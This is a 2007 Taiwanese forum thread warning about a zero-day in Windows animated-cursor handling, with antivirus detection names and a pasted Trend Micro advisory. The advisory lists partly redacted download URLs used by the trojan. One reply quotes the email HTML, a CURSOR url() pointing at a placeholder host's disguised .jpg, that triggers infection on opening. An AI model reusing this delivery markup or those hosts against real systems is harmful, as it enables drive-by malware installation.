| 會員  | 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 在最近分析的樣本中,有幾個樣本非常詭異,昨天晚上稍微檢查他們的檔案格式,發現是 Animated Cursor (*.ani) (但卻取名為 *.jpg),今天早上有個朋友通知我,微軟公佈一個安全漏洞 (Vulnerability in Windows Animated Cursor Handling),才恍然大悟,原來是零時差攻擊 (Zero-Day Attack)。 到目前為止,下面的防毒軟體可以偵測這些惡意檔案: ANI_attack-all/1.jpg: [ Kaspersky ], “Trojan-Downloader.Win32.Ani.g” [ McAfee ], “Exploit-ANIfile.c” ANI_attack-all/2.jpg: [ Kaspersky ], “Trojan-Downloader.Win32.Ani.g” [ McAfee ], “Exploit-ANIfile.c” ANI_attack-all/7888p.jpg: [ Kaspersky ], “Trojan-Downloader.Win32.Ani.g” [ McAfee ], “Exploit-ANIfile.c” ANI_attack-all/9197p.jpg: [ Kaspersky ], “Trojan-Downloader.Win32.Ani.g” [ McAfee ], “Exploit-ANIfile.c” ANI_attack-all/da.jpg: [ Kaspersky ], “Trojan-Downloader.Win32.Ani.g” [ McAfee ], “Exploit-ANIfile.c” 詳細的資訊,請參考「台灣出現零時差攻擊 (Zero-Day Attack)」。  |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 請問使用火狐瀏覽器也會受影響嗎 |
| 回覆 |
| 會員  | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 引用:
| |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 引用:
| |
| 回覆 |
| 會員  | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) mcafee在3/28號已經公佈Exploit-ANIfile.c定義,詳細資訊參考 http://tw.mcafee.com/virusInfo/defau...virus_k=141860 Kaspersky在3/30號公佈Trojan-Downloader.Win32.Ani.g定義,目前尚無詳細資訊 http://www.viruslist.com/en/find?sea....Ani.g&x=0&y=0 symantec(norton)在3/30號公佈Bloodhound.Exploit.131定義,詳細資訊參考 http://www.symantec.com/enterprise/s...300308-3019-99 樣本一virustotal測試  |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) TrendMicro詳細說明:http://www.trendmicro.com/vinfo/zh-t...5FANICMOO%2EAX --------------------------------------------------------------------------------------------以下資訊擷取自"趨勢科技網路安全百科(台灣)" 惡意程式類別: Trojan 別名: No Alias Found 廣泛傳播: 是 破壞性的: 不 語言: English 平台: Windows XP 加密的: 不 整體的風險程度: 低度 -------------------------------------------------------------------------------- 回報的感染案例: 低度 損害可能性: 中度 散佈可能性: 低度 -------------------------------------------------------------------------------- 描述: To get a one-glance comprehensive view of the behavior of this malware, refer to the Behavior Diagram shown below. Malware Overview This Trojan may arrive on a system as a specially crafted animated cursor (.ANI) file downloaded from the Internet by unsuspecting users. It may be downloaded by on a system via a specially crafted HTML email message. It takes advantage of a vulnerability in the way Windows handles animated cursor files (.ANI). More information regarding this flaw can be found on the following Microsoft Web page: Security Advisory 935423 It uses the said vulnerability to download and execute files from several URLs. One of the downloaded files is detected by Trend Micro as TROJ_SMALL.DRF. As a result, routines of the downloaded Trojan may also be exhibited on the affected system. 掃描引擎版本最低需求: 8.000 需要的病毒碼: 4.375.00 病毒碼發佈日期: Mar 28, 2007 -------------------------------------------------------------------------------- 解決方案: Important Windows XP Cleaning Instructions Users running Windows XP must disable System Restore to allow full scanning of infected computers. Users running other Windows versions can proceed with the succeeding solution set(s). Running Trend Micro Antivirus If you are currently running in safe mode, please restart your computer normally before performing the following solution. Scan your computer with Trend Micro antivirus and delete files detected as TROJ_ANICMOO.AX and TROJ_SMALL.DRF. To do this, Trend Micro customers must download the latest virus pattern file and scan their computer. Other Internet users can use HouseCall, the Trend Micro online virus scanner. Note: As of this writing, there is no available patch for the Windows vulnerability that this malware exploits. Trend Micro recommends checking the Microsoft Web site for the latest patches and updates. 常駐記憶體: 不 惡意程式大小: 794 Bytes 最初收到的樣本: Mar 28, 2007 相關: TROJ_SMALL.DRF -------------------------------------------------------------------------------- 病毒發作情形 1: Downloads files -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- 細節: This Trojan may arrive on a system as a specially crafted animated cursor (.ANI) file downloaded from the Internet by unsuspecting users. It may be downloaded by on a system via a specially crafted HTML email message. It takes advantage of a vulnerability in the way Windows handles animated cursor files (.ANI). More information regarding this flaw can be found on the following Microsoft Web page: Security Advisory 935423 It uses the said vulnerability to download and execute files from the following URLs: http://220.71.{BLOCKLED}.189/wincf.exe - detected as TROJ_SMALL.DRF http://{BLOCKED}yadsfdg.biz/adv/014/win32.exe http://{BLOCKED}yadsfdg.biz/adv/102/win32.exe http://{BLOCKED}yadsfdg.biz/adv/109/win32.exe http://{BLOCKED}yadsfdg.biz/adv/110/win32.exe http://{BLOCKED}yadsfdg.biz/adv/113/win32.exe http://{BLOCKED}yadsfdg.biz/adv/114/win32.exe http://{BLOCKED}yadsfdg.biz/adv/133/win32.exe http://{BLOCKED}yadsfdg.biz/adv/134/win32.exe http://{BLOCKED}yadsfdg.biz/adv/139/ http://{BLOCKED}yadsfdg.biz/adv/139/win32.exe http://{BLOCKED}yadsfdg.biz/adv/147/win32.exe http://{BLOCKED}yadsfdg.biz/adv/152/win32.exe http://{BLOCKED}yadsfdg.biz/adv/153/win32.exe http://{BLOCKED}yadsfdg.biz/adv/159/win32.exe http://{BLOCKED}yadsfdg.biz/adv/161/win32.exe http://{BLOCKED}yadsfdg.biz/adv/163/win32.exe http://{BLOCKED}yadsfdg.biz/adv/165/win32.exe http://{BLOCKED}yadsfdg.biz/adv/169/win32.exe http://{BLOCKED}yadsfdg.biz/adv/171/win32.exe http://{BLOCKED}yadsfdg.biz/adv/176/win32.exe http://{BLOCKED}yadsfdg.biz/adv/177/win32.exe http://{BLOCKED}yadsfdg.biz/adv/180/win32.exe http://{BLOCKED}yadsfdg.biz/adv/185/win32.exe http://{BLOCKED}yadsfdg.biz/adv/186/win32.exe http://{BLOCKED}yadsfdg.biz/adv/198/win32.exe http://www.{BLOCKED}vmtek.com/2/11.exe http://www.{BLOCKED}vmtek.com/2/11.exe http://www.{BLOCKED}crcmedia.net/exe/flash.exe http://www.{BLOCKED}crcmedia.net/exe/flash.exe http://www.{BLOCKED}softhelp.com/update.exe http://www.{BLOCKED}softhelp.com/update.exe As a result, routines of the downloaded files may also be exhibited on the affected system. This Trojan runs on Windows XP. |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 再來一個VT測試  |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 病毒真的日新月異 防不勝防 |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 不是VB Script,也不是特殊的語法,我看過的問題Html原始碼大概是含: <DIV style=3D"CURSOR: =url('http://xxxx.xxx.xxx.xxx/xxxx.jpg')"> <DIV=20 style=3D"CURSOR: =url('http://xxx.xxx.xxx.xxx/yyyy.jpg'')"></DIV></DIV> 很可怕,郵件一開就中木馬了,也不用點附加檔案,外觀也看不出來. 防毒廠商竟認為是低風險,我想很多被入侵的網頁會被改成此手法. 只希望微軟快出修正程式. |
| 回覆 |
| 會員 | 回覆: 【警告】台灣出現零時差攻擊 (Zero-Day Attack) 在別的網站(360安全衛士, 360Safe)有看到說有更新程式, 但不是MS發佈的,所以不知道該不該下載安裝? 此篇文章於 2007-04-02 02:20 PM 被 huseinma 編輯。. |
| 回覆 |
| |
類似的主題 | ||||
| 主題 | 主題作者 | 討論版 | 回覆 | 最後發表 |
| 【問題】請教 Smurf attack 的觀念(有誤請指正) | b90220208 | -- 網 路 技 術 版 | 0 | 2008-04-13 04:13 AM |
| 急救~一直被ping attack | Lansilote | -- 其 他 軟 體 討 論 版 | 3 | 2002-05-21 01:17 PM |
| Attack: Duron 1200 Takes On the Pentium 4 | s800 | -- 電 腦 硬 體 討 論 版 | 0 | 2001-11-21 03:58 PM |
| XML | RSS 2.0 | RSS |
本論壇所有文章僅代表留言者個人意見,並不代表本站之立場,討論區以「即時留言」方式運作,故無法完全監察所有即時留言,若您發現文章可能有異議,請 email :[email protected] 處理。
